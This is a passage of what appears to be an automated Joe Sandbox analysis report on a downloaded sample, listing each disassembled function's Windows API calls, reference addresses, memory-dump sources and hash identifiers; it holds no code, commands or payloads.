                                                                                                            • Instruction ID: cc21ad149ca6e04ef4077bc9f82b8c808b893121a703273de10a340766e26e7b
                                                                                                            • Opcode Fuzzy Hash: 07066e7839e8ab705ae0eb1ac891b3da5b9de1e5cc15b9871e913db4c1634347
                                                                                                            • Instruction Fuzzy Hash: 9A519D31A00904DBEB1ADF84CAA9B6DB776FBA0309F1482ADD016AF6D5C3359A51CF40
                                                                                                            Function 00302754 Relevance: 10.6, APIs: 7, Instructions: 92stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrcmpiW.KERNEL32(?,-00372F28,00000000,?,?,?,?,?), ref: 0030278C
                                                                                                            • _memset.LIBCMT ref: 003027B1
                                                                                                            • lstrcpyW.KERNEL32(?,-00372F28,?,?,?,?,?,?,?), ref: 003027CF
                                                                                                              • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00302815
                                                                                                              • Part of subcall function 00302A80: construct.LIBCPMTD ref: 00302B09
                                                                                                            • StrCatW.SHLWAPI(00000000,00332714), ref: 00302863
                                                                                                            • StrCatW.SHLWAPI(00000000,?), ref: 00302874
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 003028D6
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003028E8
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003028F8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpy$CloseFreeHandleLocalNextProcess32_memset_wcsrchrconstructlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449763073-0
                                                                                                            • Opcode ID: 0274851895f855c6450ef812f4c5362147fa28e85baf58339c4df6c964cec5f6
                                                                                                            • Instruction ID: beace1b966faa3955e76b0c5dd6950cbe8601bc1dffedb38b0661d6bbee1a56d
                                                                                                            • Opcode Fuzzy Hash: 0274851895f855c6450ef812f4c5362147fa28e85baf58339c4df6c964cec5f6
                                                                                                            • Instruction Fuzzy Hash: 79416DB5D05218DBCB26DF64CC98BDEB7B8EF58300F008598E10AB7290EB759A84CF50
                                                                                                            Function 00317236 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75threadsynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00317287
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003172A7
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003172BF
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 003172DE
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 0031730C
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00317361
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031738D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003173AD
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003173C5
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 003173E4
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00317412
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 738346648-2564639436
                                                                                                            • Opcode ID: a37357b4b4fe48e165bd0b98fd752a1139a7c084e8656d6419a82ebe5560c2ac
                                                                                                            • Instruction ID: 2f976b57de63629d748c8f5ec36f89a48b12c2ecb08afbe4683f897ae120d13d
                                                                                                            • Opcode Fuzzy Hash: a37357b4b4fe48e165bd0b98fd752a1139a7c084e8656d6419a82ebe5560c2ac
                                                                                                            • Instruction Fuzzy Hash: A031A474E04208DFDB19CF94C888B9DFBB6BF48315F28C659E9166B394C775A886CB40
                                                                                                            Function 0031C770 Relevance: 10.6, APIs: 7, Instructions: 74threadmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 0031C786
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000004,00000000), ref: 0031C7A9
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0031C7C0
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 0031C7FE
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031C812
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031C82C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C836
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleLocalThread$AllocEventFreeResume
                                                                                                            • String ID:
                                                                                                            • API String ID: 4097846125-0
                                                                                                            • Opcode ID: a0b8786962621f62d980b932960872469b62e62b37a336eff81f5d6bb53509c4
                                                                                                            • Instruction ID: b247269131529b85aadf354f2b523a87f202a9c2f766d0d3c3c40af8d5837388
                                                                                                            • Opcode Fuzzy Hash: a0b8786962621f62d980b932960872469b62e62b37a336eff81f5d6bb53509c4
                                                                                                            • Instruction Fuzzy Hash: 83215E79E50208FBDB09DFA4D889B9E77B5AB4C300F209554F609AB290C7309A84CB50
                                                                                                            Function 0031F080 Relevance: 10.6, APIs: 7, Instructions: 62filememoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0031F09C
                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 0031F0B1
                                                                                                            • LocalAlloc.KERNEL32(00000040,000000FF), ref: 0031F0C6
                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 0031F0E7
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0031F0FD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031F114
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0031F11E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2550598358-0
                                                                                                            • Opcode ID: ffb0bafd365a78fe22e54814b74c7dec8ad05f4536b63a8e1170b50d37d46297
                                                                                                            • Instruction ID: a132b0579c43aa71b53d9627774fcfa69c78cb2dadb7d932df78f9d89ce56de3
                                                                                                            • Opcode Fuzzy Hash: ffb0bafd365a78fe22e54814b74c7dec8ad05f4536b63a8e1170b50d37d46297
                                                                                                            • Instruction Fuzzy Hash: C7212974A00208FFCB19DFA4DC89B9EB7B9AB4C700F108564F515A7290D634AA85CB50
                                                                                                            Function 0030A0F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62registrymemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 0030A113
                                                                                                            • RegGetValueW.ADVAPI32(80000001,?,-00008688,00000008,00000000,00000000,00000000), ref: 0030A148
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0030A158
                                                                                                            • RegGetValueW.ADVAPI32(80000001,?,-00008688,00000008,00000000,00000000,00000000), ref: 0030A189
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A1A4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalValue$AllocFree__snwprintf
                                                                                                            • String ID: SOFTWARE\%s
                                                                                                            • API String ID: 297434584-297323700
                                                                                                            • Opcode ID: a3ab7636099ea80aede3fa578b1f73f28afd2e3c08c0b9fe5e1b7009196396c2
                                                                                                            • Instruction ID: c7975e08af851949015fe7f4b4a22cba69eb8b67d0a48a0b6c0d0f3275a1a63e
                                                                                                            • Opcode Fuzzy Hash: a3ab7636099ea80aede3fa578b1f73f28afd2e3c08c0b9fe5e1b7009196396c2
                                                                                                            • Instruction Fuzzy Hash: 58213071600208FFE715CF94DC89FEEB778EF54704F108158BA08AB280D671AA44CB94
                                                                                                            Function 0032109F Relevance: 10.6, APIs: 7, Instructions: 51synchronizationsleepmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003210EA
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00321149
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0032117D
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003211A0
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003211B8
                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 003211D1
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003211EB
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00321203
                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 0032126B
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00321281
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000004), ref: 00321298
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00321580,00000000,00000000,00000000), ref: 003212C4
                                                                                                            • GetTickCount.KERNEL32 ref: 003212E1
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00321309
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 003213D7
                                                                                                            • closesocket.WS2_32(00000000), ref: 003213E1
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 003213F2
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003213FE
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321419
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003214D7
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 003214E8
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003214F4
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321504
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0032151B
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321534
                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0032154E
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321558
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321568
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321572
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$CloseHandle$Event$Create$AllocCountLocalMutexReleaseSleepThreadTickclosesocketsetsockoptshutdown
                                                                                                            • String ID:
                                                                                                            • API String ID: 2693238558-0
                                                                                                            • Opcode ID: f9de0b3a9793678bb18e37ed2721d90974b6b0abad65e0d64f3faa4c13d7b636
                                                                                                            • Instruction ID: 3adbae045b903b6f9914cd1822215a94dfa05921c1de37b8e67313897a712fe1
                                                                                                            • Opcode Fuzzy Hash: f9de0b3a9793678bb18e37ed2721d90974b6b0abad65e0d64f3faa4c13d7b636
                                                                                                            • Instruction Fuzzy Hash: F6111F74900214DFDB2ADFA0ED8CBAEB779FB58305F608549E60A662A0C7799984CF50
                                                                                                            Function 0030FA30 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 0030FA3E
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0030FA61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Module$FileHandleName
                                                                                                            • String ID: KERNEL32.DLL$USER32.DLL
                                                                                                            • API String ID: 4146042529-2880226457
                                                                                                            • Opcode ID: 89309fc7eb6346450309b868c57fa43f7acad17f4e7d80e04880ab48b971b698
                                                                                                            • Instruction ID: a64b05fbbda6d2d1a155849910036045ee165b8763a72d045a13a573c29bf626
                                                                                                            • Opcode Fuzzy Hash: 89309fc7eb6346450309b868c57fa43f7acad17f4e7d80e04880ab48b971b698
                                                                                                            • Instruction Fuzzy Hash: 71018B71B5521DEFC731DB709C9CBA972BCA758704F1044B4E50ED29C0E3B49A84DE61
                                                                                                            Function 00328091 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0033A5D0,00000008,00328199,00000000,00000000,?,?,003272E3,003246A2,?,?,00305B93,?), ref: 003280A2
                                                                                                            • __lock.LIBCMT ref: 003280D6
                                                                                                              • Part of subcall function 0032C725: __mtinitlocknum.LIBCMT ref: 0032C73B
                                                                                                              • Part of subcall function 0032C725: __amsg_exit.LIBCMT ref: 0032C747
                                                                                                              • Part of subcall function 0032C725: EnterCriticalSection.KERNEL32(00305B93,00305B93,?,003280DB,0000000D,?,?,003272E3,003246A2,?,?,00305B93,?), ref: 0032C74F
                                                                                                            • InterlockedIncrement.KERNEL32(888D8B31), ref: 003280E3
                                                                                                            • __lock.LIBCMT ref: 003280F7
                                                                                                            • ___addlocaleref.LIBCMT ref: 00328115
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                            • String ID: KERNEL32.DLL
                                                                                                            • API String ID: 637971194-2576044830
                                                                                                            • Opcode ID: db74c46592c2e780cd1d79194976ff1c083544cfbab99763b62c9860de7fff81
                                                                                                            • Instruction ID: 13f9afb0d1e1be062bccdb818a5547017adb2ab25261b9f82d31b96c91c1f1ef
                                                                                                            • Opcode Fuzzy Hash: db74c46592c2e780cd1d79194976ff1c083544cfbab99763b62c9860de7fff81
                                                                                                            • Instruction Fuzzy Hash: 2C016D71405B04EEE7229F69E84674AFBF0AF40325F10890EE4D65B2A1CBB4BA45DF12
                                                                                                            Function 00306010 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0030602B
                                                                                                            • GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0030603D
                                                                                                            • GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 00306051
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                                            • API String ID: 667068680-2897241497
                                                                                                            • Opcode ID: 5682538f95be50294cbe884dccf4fa223e6ef28d547f87a5818805950c82c65c
                                                                                                            • Instruction ID: 43f7843ffe8a61e2e15fa9a68eeece6425b35fb254d6ac9e7a927b1407c41930
                                                                                                            • Opcode Fuzzy Hash: 5682538f95be50294cbe884dccf4fa223e6ef28d547f87a5818805950c82c65c
                                                                                                            • Instruction Fuzzy Hash: ACF0E7B4961204EFD7379BA0ECDAB6A7B7CE708311F10515DF909422A0CAB549C4CF51
                                                                                                            Function 00306850 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL,?,?,0031BC23), ref: 00306859
                                                                                                            • GetProcAddress.KERNEL32(0031BC23,RtlDecompressBuffer), ref: 0030686B
                                                                                                            • GetProcAddress.KERNEL32(0031BC23,RtlGetCompressionWorkSpaceSize), ref: 0030687F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: NTDLL.DLL$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize
                                                                                                            • API String ID: 667068680-1459209654
                                                                                                            • Opcode ID: 6edc77674a61b7fe18e567370d1894f65136092daf632c20b8109617cb4dfad7
                                                                                                            • Instruction ID: 68f7201bd6b48e4b5900ccd7efce618a636d88338ecf41b6ed402e0abc5d9d31
                                                                                                            • Opcode Fuzzy Hash: 6edc77674a61b7fe18e567370d1894f65136092daf632c20b8109617cb4dfad7
                                                                                                            • Instruction Fuzzy Hash: C1F03A74525304EBEB2BCBA4EC5ABAA76B8F704301F00659EE805822A0D7745D84CB51
                                                                                                            Function 00327665 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __CreateFrameInfo.LIBCMT ref: 0032768D
                                                                                                              • Part of subcall function 003239A8: __getptd.LIBCMT ref: 003239B6
                                                                                                              • Part of subcall function 003239A8: __getptd.LIBCMT ref: 003239C4
                                                                                                            • __getptd.LIBCMT ref: 00327697
                                                                                                              • Part of subcall function 003281BE: __getptd_noexit.LIBCMT ref: 003281C1
                                                                                                              • Part of subcall function 003281BE: __amsg_exit.LIBCMT ref: 003281CE
                                                                                                            • __getptd.LIBCMT ref: 003276A5
                                                                                                            • __getptd.LIBCMT ref: 003276B3
                                                                                                            • __getptd.LIBCMT ref: 003276BE
                                                                                                            • _CallCatchBlock2.LIBCMT ref: 003276E4
